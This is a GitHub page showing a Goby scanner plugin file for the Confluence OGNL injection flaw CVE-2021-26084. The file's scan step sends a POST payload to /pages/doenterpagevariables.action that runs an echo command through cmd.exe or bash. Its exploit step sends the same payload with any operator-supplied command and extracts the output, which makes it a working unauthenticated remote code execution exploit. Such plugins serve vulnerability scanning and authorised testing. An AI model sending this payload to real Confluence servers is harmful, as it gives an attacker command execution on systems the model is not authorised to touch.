-
Notifications
You must be signed in to change notification settings - Fork 0
/
Confluence_RCE_CVE_2021_26084.json
82 lines (82 loc) · 4.4 KB
/
Confluence_RCE_CVE_2021_26084.json
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
{
"Name": "Confluence RCE(CVE-2021-26084)",
"Level": "3",
"Tags": [
"RCE"
],
"GobyQuery": "product=\"Confluence\"",
"Description": "In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an unauthenticated attacker to execute arbitrary code on a Confluence Server or Data Center instance. The affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5.",
"Product": "Atlassian Confluence",
"Homepage": "https://www.atlassian.com/zh/software/confluence",
"Author": "aetkrad",
"Impact": "<p>allow an unauthenticated attacker to execute arbitrary code on a Confluence Server or Data Center instance<br></p>",
"Recommandation": "",
"References": [
"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26084"
],
"HasExp":true,
"ExpParams":[
{
"name":"cmd",
"type":"input",
"value":"whoami",
"show":""
}
],
"ScanSteps": [
"AND",
{
"Request": {
"method": "POST",
"uri": "/pages/doenterpagevariables.action",
"follow_redirect": false,
"header": {
"Content-Type": "application/x-www-form-urlencoded"
},
"data_type": "text",
"data": "queryString=\\u0027%2b#{\\u0022\\u0022[\\u0022class\\u0022].forName(\\u0022javax.script.ScriptEngineManager\\u0022).newInstance().getEngineByName(\\u0022js\\u0022).eval(\\u0022var isWin=java.lang.System.getProperty(\\u0027os.name\\u0027).toLowerCase().contains(\\u0027win\\u0027);var p=new java.lang.ProcessBuilder;if(isWin){p.command([\\u0027cmd.exe\\u0027,\\u0027/c\\u0027,\\u0027echo workwork\\u0027]);}else{p.command([\\u0027/bin/bash\\u0027,\\u0027-c\\u0027,\\u0027echo workwork\\u0027]);}p.redirectErrorStream(true);var pc=p.start();org.apache.commons.io.IOUtils.toString(pc.getInputStream())\\u0022)}%2b\\u0027"
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "workwork",
"bz": ""
}
]
},
"SetVariable": []
}
],
"ExploitSteps":[
"AND",
{
"Request": {
"method": "POST",
"uri": "/pages/doenterpagevariables.action",
"follow_redirect": false,
"header": {
"Content-Type": "application/x-www-form-urlencoded"
},
"data_type": "text",
"data": "queryString=\\u0027%2b#{\\u0022\\u0022[\\u0022class\\u0022].forName(\\u0022javax.script.ScriptEngineManager\\u0022).newInstance().getEngineByName(\\u0022js\\u0022).eval(\\u0022var isWin=java.lang.System.getProperty(\\u0027os.name\\u0027).toLowerCase().contains(\\u0027win\\u0027);var p=new java.lang.ProcessBuilder;if(isWin){p.command([\\u0027cmd.exe\\u0027,\\u0027/c\\u0027,\\u0027{{{cmd}}}\\u0027]);}else{p.command([\\u0027/bin/bash\\u0027,\\u0027-c\\u0027,\\u0027{{{cmd}}}\\u0027]);}p.redirectErrorStream(true);var pc=p.start();org.apache.commons.io.IOUtils.toString(pc.getInputStream())\\u0022)}%2b\\u0027"
},
"SetVariable": [
"output|lastbody|regex|value=\"{([\\s\\S]*)=null}\""
]
}
],
"PostTime": "2021-10-27 13:33:02",
"GobyVersion": "1.8.294"
}